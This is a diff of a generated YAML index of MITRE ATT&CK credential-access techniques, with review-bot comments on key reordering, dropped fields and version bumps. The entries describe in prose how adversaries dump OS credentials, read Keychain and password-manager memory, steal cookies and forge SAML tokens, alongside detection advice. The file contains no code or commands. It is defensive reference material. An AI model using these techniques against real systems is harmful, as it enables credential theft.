- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43235,6 +43896,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
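Review bot: Key order is inconsistent across objects: this hunk moves `x_mitre_attack_spec_version: 3.2.0` for T1110.001 up next to `kill_chain_phases`, the following hunks move `x_mitre_modified_by_ref` up as well and delete both from the bottom of the object, and T1539 and T1606.002 get the same treatment, yet neighbouring objects such as T1003 and T1003.002 keep both keys at the end. Emitting keys in a fixed order from the generator would remove these reorder-only hunks and leave only real content changes to review.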
@@ -43246,18 +43908,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43284,14 +43946,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43415,12 +44074,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43435,10 +44093,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -43446,14 +44105,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -43496,14 +44155,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -43558,14 +44214,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43616,14 +44271,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43657,8 +44311,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -43675,11 +44329,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -43697,7 +44350,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -43714,10 +44367,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43741,46 +44394,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -43801,65 +44420,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
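Review bot: The removed T1003.004 reference block contains a `Powersploit` entry with keys in an irregular order (`url`, `description`, then `source_name`) and a Tilbury citation reading `1Windows Credentials`; the re-add further below normalizes the key order but keeps the `1Windows` typo, which should be fixed upstream rather than hand-edited in this generated file. The T1555.001 portion of this hunk is a pure reorder: `x_mitre_version` stays at '1.1' while `modified`, `x_mitre_attack_spec_version` and the slideshare URL and retrieval date advance, consistent with a re-export rather than a content change.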
@@ -43868,6 +44484,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -43875,31 +44494,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
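Review bot: As with T1556.003 above, T1003.004 loses `x_mitre_permissions_required: [SYSTEM]` with no replacement while the version moves 1.0 to 1.1; the requirement survives only in the description prose ("Adversaries with SYSTEM access"), so note the field removal in the commit message for anyone consuming it. In the T1606.002 description, the `Azure AD` to `Entra ID` rename is the only content change, but the surrounding context lines show `conditions ...` where an element name was lost in export and `NotOnOrAfter`, `AccessTokenLifetime` and `LifetimeTokenPolicy` isolated on their own lines inside a `|-` scalar; both are pre-existing generator artifacts, not introduced here.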
@@ -43912,14 +44563,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -43960,14 +44611,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
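Review bot: `- spec_version: '2.1'` is dropped from the T1606.002 object here and from each of the technique objects that follow, with nothing replacing it. That is a STIX bundle-level field rather than ATT&CK metadata, so omitting it is defensible, but confirm the generator's source really stopped carrying it (rather than the field being lost in conversion) and that no consumer of the index reads it. Unrelated to this change but visible in the T1003.007 context line: `/proc//maps` and `/proc//mem` read as if a PID placeholder was stripped; if the stored description really has the empty path segment, that is an upstream text problem to check against the source rather than something to patch in a generated file.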
@@ -44030,81 +44678,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
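Review bot: the T1555.005 object is deleted and re-added wholesale because its key order changed, and the substantive edits are buried in the middle: `x_mitre_version` goes from `'1.0'` to `'1.1'`, `x_mitre_attack_spec_version` from `2.1.0` to `3.2.0`, `x_mitre_deprecated: false` and `revoked: false` are new, and `x_mitre_permissions_required: - User` is dropped with nothing replacing it, while the description text is byte-for-byte the same. The dropped permissions field is the one piece of information the index loses here and should be called out in the commit message. Note also that the rebuilt object still ends at `atomic_tests: []` with no `identifier: T1555.005` line, whereas T1003.007 above keeps `identifier: T1003.007`; if the generator is meant to emit `identifier` for every technique, this object is missing it.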
@@ -44189,12 +44835,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
